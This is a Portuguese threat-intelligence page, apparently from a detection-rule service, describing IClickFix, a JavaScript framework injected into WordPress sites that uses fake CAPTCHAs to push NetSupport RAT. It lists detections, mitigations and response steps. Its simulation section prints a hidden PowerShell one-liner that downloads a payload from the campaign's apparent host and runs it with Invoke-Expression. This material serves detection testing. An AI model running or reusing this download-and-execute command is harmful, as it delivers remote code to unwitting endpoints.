Conheça o IClickFix: um framework amplamente difundido que tem como alvo o WordPress utilizando a tática ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório perfila IClickFix, um framework de JavaScript malicioso que compromete sites WordPress e apresenta um CAPTCHA falsificado no estilo do Cloudflare Turnstile. A armadilha coage os visitantes a executar um comando PowerShell que baixa e instala NetSupport RAT. A entrega é suportada por um sistema de distribuição de tráfego construído em torno do YOURLS encurtador de URL e um conjunto rotativo de domínios redirecionadores. Pesquisadores observaram mais de 3.800 sites WordPress comprometidos servindo essa cadeia globalmente desde o final de 2024.
Investigação
Analistas da Sekoia identificaram a tag JavaScript injetada ic-tracker-js em sites comprometidos e então reconstruíram o fluxo de redirecionamento através de múltiplos domínios de curta duração. Eles capturaram o padrão exato de execução do PowerShell usado para recuperar o payload final e recuperaram os componentes caídos do NetSupport RAT juntamente com indicadores de infraestrutura C2 associados.
Mitigação
Monitore o conteúdo da web para a ic-tracker-js injeção e bloqueie domínios maliciosos conhecidos, redirecionadores e serviços de links curtos usados na cadeia. Nos terminais, detecte padrões de download e execução do PowerShell consistentes com a armadilha ClickFix. Adicione cobertura para criação de arquivos do cliente NetSupport e para persistência através de Run chaves de registro no nível do usuário.
Resposta
Quando indicadores surgirem, isole o terminal, interrompa o processo ativo do PowerShell e remova os binários do NetSupport além de qualquer persistência baseada em registro. Siga com uma triagem forense completa para confirmar que o atacante não implantou implantes adicionais ou estabeleceu caminhos de acesso secundários.
Fluxo de Ataque
Detecções
Download ou Upload via Powershell (via cmdline)
Visualizar
Arquivos Suspeitos no Perfil de Usuário Público (via file_event)
Visualizar
A Possibilidade de Execução Através de Linhas de Comando do PowerShell Ocultas (via cmdline)
Visualizar
Uso Suspeito do Invoke-RestMethod (via powershell)
Visualizar
Possível Tentativa de Execução de Binário Gerente NetSupport de Diretório Suspeito (via process_creation)
Visualizar
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)
Visualizar
IOCs (HashSha256) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix
Visualizar
IOCs (DestinationIP) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix
Visualizar
IOCs (SourceIP) para detectar: Conheça o IClickFix: um framework direcionado a WordPress usando a tática ClickFix
Visualizar
Detecção de Injeção de JavaScript Malicioso IClickFix [Servidor Web]
Visualizar
Execução de Comando PowerShell para Entrega do NetSupport RAT [PowerShell do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Telemetria & Baseline Pre‑flight Check deve ter passado.
-
Narrativa e Comandos do Ataque:
Um adversário que tem acesso inicial ao terminal deseja estabelecer uma presença permanente entregando o NetSupport RAT. Para evadir a detecção interativa, eles lançam o PowerShell em modo oculto sem perfil ou logo (
-w hidden -nop -c). Eles então usamInvoke‑WebRequest(iwr) para baixar um payload JSON malicioso (tytuy.json) que contém um script PowerShell para o RAT. O script é escrito no diretório temporário e executado viaInvoke‑Expression. Esta linha de comando exata corresponde às strings que a regra Sigma monitora. -
Script de Teste de Regressão:
# One-liner PowerShell que corresponde à regra de detecção $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Comandos de Limpeza:
# Remove o payload baixado e qualquer processo PowerShell remanescente Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force